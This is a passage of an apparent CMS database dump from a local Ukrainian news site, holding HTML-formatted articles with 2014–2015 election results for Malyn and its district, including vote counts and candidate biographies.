blue;\">Комуністична партія України</span></a></span></p>\r\n</td>\r\n<td style=\"width: 9.36%; padding: 0.75pt;\" width=\"9%\">&nbsp;</td>\r\n<td style=\"width: 17.5%; padding: 0.75pt;\" width=\"17%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">3.87</span></p>\r\n</td>\r\n<td style=\"width: 19%; padding: 0.75pt;\" width=\"19%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">610 661</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 6.5%; padding: 0.75pt;\" width=\"6%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">9 </span></p>\r\n</td>\r\n<td style=\"width: 46.68%; padding: 0.75pt;\" width=\"46%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp302pt001f01=910pf7171=176.html\"><span style=\"color: blue;\">Партія Сергія Тігіпка \"Сильна Україна\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 9.36%; padding: 0.75pt;\" width=\"9%\">&nbsp;</td>\r\n<td style=\"width: 17.5%; padding: 0.75pt;\" width=\"17%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">3.11</span></p>\r\n</td>\r\n<td style=\"width: 19%; padding: 0.75pt;\" width=\"19%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">490 504</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 6.5%; padding: 0.75pt;\" width=\"6%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">10 </span></p>\r\n</td>\r\n<td style=\"width: 46.68%; padding: 0.75pt;\" width=\"46%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp302pt001f01=910pf7171=164.html\"><span style=\"color: blue;\">Політична партія \"Громадянська позиція (Анатолій Гриценко)\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 9.36%; padding: 0.75pt;\" width=\"9%\">&nbsp;</td>\r\n<td style=\"width: 17.5%; padding: 0.75pt;\" width=\"17%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">3.10</span></p>\r\n</td>\r\n<td style=\"width: 19%; padding: 0.75pt;\" width=\"19%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">489 386</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 6.5%; padding: 0.75pt;\" width=\"6%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">11 </span></p>\r\n</td>\r\n<td style=\"width: 46.68%; padding: 0.75pt;\" width=\"46%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp302pt001f01=910pf7171=206.html\"><span style=\"color: blue;\">ПОЛІТИЧНА ПАРТІЯ \"ВСЕУКРАЇНСЬКЕ АГРАРНЕ ОБ’ЄДНАННЯ \"ЗАСТУП\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 9.36%; padding: 0.75pt;\" width=\"9%\">&nbsp;</td>\r\n<td style=\"width: 17.5%; padding: 0.75pt;\" width=\"17%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">2.65</span></p>\r\n</td>\r\n<td style=\"width: 19%; padding: 0.75pt;\" width=\"19%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">418 023</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 6.5%; padding: 0.75pt;\" width=\"6%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">12 </span></p>\r\n</td>\r\n<td style=\"width: 46.68%; padding: 0.75pt;\" width=\"46%\">\r\n<p style=\"margin-bottom: 0.0001pt; line-height: normal;\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\"><a href=\"http://www.cvk.gov.ua/pls/vnd2014/wp302pt001f01=910pf7171=158.html\"><span style=\"color: blue;\">Політична партія \"ПРАВИЙ СЕКТОР\"</span></a></span></p>\r\n</td>\r\n<td style=\"width: 9.36%; padding: 0.75pt;\" width=\"9%\">&nbsp;</td>\r\n<td style=\"width: 17.5%; padding: 0.75pt;\" width=\"17%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">1.80</span></p>\r\n</td>\r\n<td style=\"width: 19%; padding: 0.75pt;\" width=\"19%\">\r\n<p style=\"margin-bottom: 0.0001pt; text-align: center; line-height: normal;\" align=\"center\"><span style=\"font-size: 9pt; font-family: \'Times New Roman\',\'serif\';\">284 790</span></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,8,'2014-11-02 07:39:36',430,'','2014-11-02 07:40:18',430,0,'0000-00-00 00:00:00','2014-11-02 07:39:36','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,51,'','',1,1291,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(1033,1293,'Відкриття музею М.М.Миклухи-Маклаю в с.Гамарня','vidkrittya-muzeyu-m-m-miklukhi-maklayu-v-s-gamarnya','<p><iframe src=\"https://www.youtube.com/embed/fE0CkJ7wmtg\" frameborder=\"0\" width=\"560\" height=\"315\" allowfullscreen=\"allowfullscreen\" style=\"display: block; margin-left: auto; margin-right: auto;\"></iframe><span id=\"transmark\"></span></p>','',1,8,'2015-03-06 17:19:02',430,'','2015-03-06 17:21:21',430,0,'0000-00-00 00:00:00','2015-03-06 17:19:02','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,50,'','',1,1005,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*','',''),(1223,1488,'ЦВК: офіційні дані по місту Малину','tsvk-ofitsijni-dani','<p><strong>Малинська міська рада</strong></p>\r\n<table border=\"1\" style=\"border-collapse: collapse;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 173.6pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"231\">ПІБ</td>\r\n<td colspan=\"2\" style=\"width: 19.95pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"27\">&nbsp;</td>\r\n<td style=\"width: 162.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"216\">Ким висунуто</td>\r\n<td style=\"width: 30.95pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"41\">&nbsp;</td>\r\n<td style=\"width: 35.5pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"47\">К-сть голосів ЗА</td>\r\n<td style=\"width: 13.35pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"18\">&nbsp;</td>\r\n<td style=\"width: 49.2pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"66\">% голосів ЗА</td>\r\n</tr>\r\n<tr style=\"height: 34.5pt;\">\r\n<td style=\"width: 173.6pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0.75pt; height: 34.5pt;\" width=\"231\">Шостак Олексій Григорович</td>\r\n<td colspan=\"2\" style=\"width: 19.95pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt; height: 34.5pt;\" width=\"27\">&nbsp;</td>\r\n<td style=\"width: 162.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt; height: 34.5pt;\" width=\"216\">політична партія Всеукраїнське об&rsquo;єднання \"Батьківщина\"</td>\r\n<td style=\"width: 30.95pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt; height: 34.5pt;\" width=\"41\">&nbsp;</td>\r\n<td style=\"width: 35.5pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt; height: 34.5pt;\" width=\"47\">3422</td>\r\n<td style=\"width: 13.35pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt; height: 34.5pt;\" width=\"18\">&nbsp;</td>\r\n<td style=\"width: 49.2pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt; height: 34.5pt;\" width=\"66\">40,4587<span id=\"transmark\"></span></td>\r\n</tr>\r\n<tr style=\"height: 3pt;\">\r\n<td style=\"width: 173.6pt; border-width: 1pt 1pt medium; border-style: solid solid none; border-color: windowtext windowtext -moz-use-text-color; padding: 0.75pt; height: 3pt;\" width=\"231\">&nbsp;</td>\r\n<td colspan=\"2\" style=\"width: 19.95pt; border-width: 1pt medium medium 1pt; border-style: solid none none solid; border-color: windowtext -moz-use-text-color -moz-use-text-color windowtext; padding: 0.75pt; height: 3pt;\" width=\"27\">&nbsp;</td>\r\n<td style=\"width: 162.3pt; border-width: 1pt 1pt medium medium; border-style: solid solid none none; border-color: windowtext windowtext -moz-use-text-color -moz-use-text-color; padding: 0.75pt; height: 3pt;\" width=\"216\">&nbsp;</td>\r\n<td style=\"width: 30.95pt; border-width: 1pt medium medium 1pt; border-style: solid none none solid; border-color: windowtext -moz-use-text-color -moz-use-text-color windowtext; padding: 0.75pt; height: 3pt;\" width=\"41\">&nbsp;</td>\r\n<td style=\"width: 35.5pt; border-width: 1pt 1pt medium medium; border-style: solid solid none none; border-color: windowtext windowtext -moz-use-text-color -moz-use-text-color; padding: 0.75pt; height: 3pt;\" width=\"47\">&nbsp;</td>\r\n<td style=\"width: 13.35pt; border-width: 1pt medium medium 1pt; border-style: solid none none solid; border-color: windowtext -moz-use-text-color -moz-use-text-color windowtext; padding: 0.75pt; height: 3pt;\" width=\"18\">&nbsp;</td>\r\n<td style=\"width: 49.2pt; border-width: 1pt 1pt medium medium; border-style: solid solid none none; border-color: windowtext windowtext -moz-use-text-color -moz-use-text-color; padding: 0.75pt; height: 3pt;\" width=\"66\">&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 173.6pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"231\">Савченко Микола Іванович</td>\r\n<td colspan=\"2\" style=\"width: 19.95pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"27\">&nbsp;</td>\r\n<td style=\"width: 162.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"216\">Самовисування</td>\r\n<td style=\"width: 30.95pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"41\">&nbsp;</td>\r\n<td style=\"width: 35.5pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"47\">1745</td>\r\n<td style=\"width: 13.35pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"18\">&nbsp;</td>\r\n<td style=\"width: 49.2pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"66\">20,6314</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 173.6pt; border-width: medium 1pt; border-style: none solid; border-color: -moz-use-text-color windowtext; padding: 0.75pt;\" width=\"231\">Противень Михайло Борисович</td>\r\n<td colspan=\"2\" style=\"width: 19.95pt; border-width: medium medium medium 1pt; border-style: none none none solid; border-color: -moz-use-text-color -moz-use-text-color -moz-use-text-color windowtext; padding: 0.75pt;\" width=\"27\">&nbsp;</td>\r\n<td style=\"width: 162.3pt; border-width: medium 1pt medium medium; border-style: none solid none none; border-color: -moz-use-text-color windowtext -moz-use-text-color -moz-use-text-color; padding: 0.75pt;\" width=\"216\">Самовисування</td>\r\n<td style=\"width: 30.95pt; border-width: medium medium medium 1pt; border-style: none none none solid; border-color: -moz-use-text-color -moz-use-text-color -moz-use-text-color windowtext; padding: 0.75pt;\" width=\"41\">&nbsp;</td>\r\n<td style=\"width: 35.5pt; border-width: medium 1pt medium medium; border-style: none solid none none; border-color: -moz-use-text-color windowtext -moz-use-text-color -moz-use-text-color; padding: 0.75pt;\" width=\"47\">676</td>\r\n<td style=\"width: 13.35pt; border-width: medium medium medium 1pt; border-style: none none none solid; border-color: -moz-use-text-color -moz-use-text-color -moz-use-text-color windowtext; padding: 0.75pt;\" width=\"18\">&nbsp;</td>\r\n<td style=\"width: 49.2pt; border-width: medium 1pt medium medium; border-style: none solid none none; border-color: -moz-use-text-color windowtext -moz-use-text-color -moz-use-text-color; padding: 0.75pt;\" width=\"66\">7,9924</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 173.6pt; border: 1pt solid windowtext; padding: 0.75pt;\" width=\"231\">Федоренко Василь Михайлович</td>\r\n<td colspan=\"2\" style=\"width: 19.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"27\">&nbsp;</td>\r\n<td style=\"width: 162.3pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"216\">ПОЛІТИЧНА ПАРТІЯ \"УКРАЇНСЬКЕ ОБ&rsquo;ЄДНАННЯ ПАТРІОТІВ &ndash; УКРОП\"</td>\r\n<td style=\"width: 30.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"41\">&nbsp;</td>\r\n<td style=\"width: 35.5pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"47\">672</td>\r\n<td style=\"width: 13.35pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"18\">&nbsp;</td>\r\n<td style=\"width: 49.2pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"66\">7,9451</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 173.6pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"231\">Гордін Тетяна Анатоліївна</td>\r\n<td colspan=\"2\" style=\"width: 19.95pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"27\">&nbsp;</td>\r\n<td style=\"width: 162.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"216\">Самовисування</td>\r\n<td style=\"width: 30.95pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"41\">&nbsp;</td>\r\n<td style=\"width: 35.5pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"47\">650</td>\r\n<td style=\"width: 13.35pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"18\">&nbsp;</td>\r\n<td style=\"width: 49.2pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"66\">7,685</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 173.6pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"231\">Карпук Анатолій Ілліч</td>\r\n<td colspan=\"2\" style=\"width: 19.95pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"27\">&nbsp;</td>\r\n<td style=\"width: 162.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"216\">Самовисування</td>\r\n<td style=\"width: 30.95pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"41\">&nbsp;</td>\r\n<td style=\"width: 35.5pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"47\">603</td>\r\n<td style=\"width: 13.35pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"18\">&nbsp;</td>\r\n<td style=\"width: 49.2pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"66\">7,1293</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 173.6pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"231\">Стельмах Сергій Володимирович</td>\r\n<td colspan=\"2\" style=\"width: 19.95pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"27\">&nbsp;</td>\r\n<td style=\"width: 162.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"216\">Політична Партія \"Опозиційний блок\"</td>\r\n<td style=\"width: 30.95pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"41\">&nbsp;</td>\r\n<td style=\"width: 35.5pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"47\">402</td>\r\n<td style=\"width: 13.35pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"18\">&nbsp;</td>\r\n<td style=\"width: 49.2pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"66\">4,7529</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 173.6pt; border-width: medium 1pt 1pt; border-style: none solid solid; border-color: -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"231\">Кондрачук Анатолій Юрійович</td>\r\n<td colspan=\"2\" style=\"width: 19.95pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"27\">&nbsp;</td>\r\n<td style=\"width: 162.3pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"216\">Самовисування</td>\r\n<td style=\"width: 30.95pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"41\">&nbsp;</td>\r\n<td style=\"width: 35.5pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"47\">288</td>\r\n<td style=\"width: 13.35pt; border-width: medium medium 1pt 1pt; border-style: none none solid solid; border-color: -moz-use-text-color -moz-use-text-color windowtext windowtext; padding: 0.75pt;\" width=\"18\">&nbsp;</td>\r\n<td style=\"width: 49.2pt; border-width: medium 1pt 1pt medium; border-style: none solid solid none; border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; padding: 0.75pt;\" width=\"66\">3,4051</td>\r\n</tr>\r\n</tbody>\r\n</table>','',1,61,'2015-10-29 08:17:08',430,'','2015-11-04 12:32:43',430,0,'0000-00-00 00:00:00','2015-10-29 08:17:08','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,3,'','',1,1204,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(1224,1489,'Інформує ЦВК: вибори сільських та селищних голів району','informue-tsvk-vibori-silskikh-ta-selishchnikh-goliv-rajonu','<table style=\"border: 1pt solid windowtext; margin-right: 6.75pt; text-align: right;\" border=\"1\" cellpadding=\"0\" cellspacing=\"1\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Барвінківська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Недашківська Людмила Миколаївна</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянка України, народилася 05.11.1971 р., освіта вища, безпартійна, Барвінківська сільська рада, Сільський голова, місце проживання: С.Новобратське</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, Будо-Вороб\'ївська сільська рада</span></td>\r\n<td style=\"width: 82.85pt; border: 1pt solid windowtext; padding: 0.75pt; text-align: left;\" width=\"110\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Навроцький Анатолій Броніславович</span></td>\r\n<td style=\"width: 70.15pt; border-width: 1pt medium; border-style: solid none; border-color: windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"94\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Самовисування</span></td>\r\n<td style=\"width: 161.95pt; border-width: 1pt medium 1pt 1pt; border-style: solid none solid solid; border-color: windowtext -moz-use-text-color windowtext windowtext; padding: 0.75pt; text-align: left;\" width=\"216\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Громадянин України, народився 23.02.1960 р., освіта вища, безпартійний, Будо-Вороб&rsquo;ївська сільська рада, Сільський голова, місце проживання: Житомирська обл., Малинський р-н, с.Будо-Вороб&rsquo;ї</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 80.4pt; border-width: 1pt 1pt 1pt medium; border-style: solid solid solid none; border-color: windowtext windowtext windowtext -moz-use-text-color; padding: 0.75pt; text-align: left;\" width=\"107\"><span style=\"font-size: 10pt; font-family: \'Times New Roman\',\'serif\';\">Малинський р-н, 